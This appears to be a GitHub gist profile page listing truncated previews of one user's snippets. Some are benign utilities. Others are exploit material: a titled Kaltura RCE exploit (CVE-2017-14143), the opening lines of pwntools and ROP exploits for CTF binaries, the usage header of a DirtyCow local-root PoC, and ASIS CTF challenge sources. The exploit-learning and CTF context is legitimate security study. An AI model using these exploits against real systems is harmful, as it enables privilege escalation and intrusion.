Skip to content

Instantly share code, notes, and snippets.

Avatar

Robin Verton rverton

View GitHub Profile
View keybase.md

Keybase proof

I hereby claim:

  • I am rverton on github.
  • I am roob (https://keybase.io/roob) on keybase.
  • I have a public key ASB7AIRlWYr7z6mxQzopO21ynOCT3d1UjcsegZtkAcnNtwo

To claim this, I am signing this object:

@rverton
rverton / kaltura_unserialize_cookie_rce.py
Created Oct 24, 2017
Kaltura <= 13.1.0 Remote Code Execution (CVE-2017-14143)
View kaltura_unserialize_cookie_rce.py
@rverton
rverton / chrome_headless_screenshot.py
Created Jul 10, 2017
Make a screenshot with a headless google chrome in python
View chrome_headless_screenshot.py
# Install chromedriver from https://sites.google.com/a/chromium.org/chromedriver/downloads
import os
from optparse import OptionParser
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
CHROME_PATH = '/usr/bin/google-chrome'
@rverton
rverton / readflag.php
Created Apr 9, 2017
ASIS CTF 2017, Tar Bomb Challenge
View readflag.php
<?php
header('Access-Control-Allow-Origin: *');
$remote = $_SERVER['REMOTE_ADDR'];
if ($remote === '127.0.0.1' || $remote === '::1') {
$flag = fopen("/flag", "r") or die("Unable to open file!");
echo fread($flag,filesize("/flag"));
fclose($flag);
} else {
echo 'what do you expect to see here?';
@rverton
rverton / admin_console.php
Created Apr 9, 2017
ASIS CTF 2017, Tar Bomb Challenge
View admin_console.php
<?php
session_start();
if ($_COOKIE['tar'] !== 'super-secret-cookie-you-never-know') {
echo "Try better cookie, bro!";
die();
}
if (isset($_POST['url']) && isset($_POST['challenge'])) {
$url = $_POST['url'];
@rverton
rverton / level1-pwn.py
Created Mar 26, 2017
exploit for level1.bin (nullcon 2017)
View level1-pwn.py
#!/usr/bin/python
# exploit for level1.bin (nullcon 2017)
from pwn import *
def add_book(p):
p.sendline('1')
p.recvuntil('Enter book name: ')
p.sendline('a')
@rverton
rverton / exploit.py
Created Nov 4, 2016
ROP Primer level2 - open, read and print flag file
View exploit.py
import struct
def p(value):
return struct.pack('<L', value);
writeable_buffer = 0x080ca004
open_addr = 0x80515f0
read_addr = 0x80516a0
write_addr = 0x8051700
@rverton
rverton / bytearray.py
Created Oct 25, 2016
Generate a bytearray for badchar detenction.
View bytearray.py
"""
This script generates a bytearray for badchar detection
and is similar to mona.py's bytearray function.
Usage:
Create bytearray.txt and bytearray.bin (0-255)
$ python bytearray.py
Create bytearray.txt and bytearray.bin and exclude chars
@rverton
rverton / cowroot.c
Created Oct 21, 2016
CVE-2016-5195 (DirtyCow) Local Root PoC
View cowroot.c
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@rverton
rverton / test_file_upload.py
Created Aug 2, 2016
Test file upload with flask (Python3)
View test_file_upload.py
from io import BytesIO
def test_file_upload(client):
data = {
'field': 'value',
'file': (BytesIO(b'FILE CONTENT'), 'test.csv')
}
rv = client.post('/upload', buffered=True,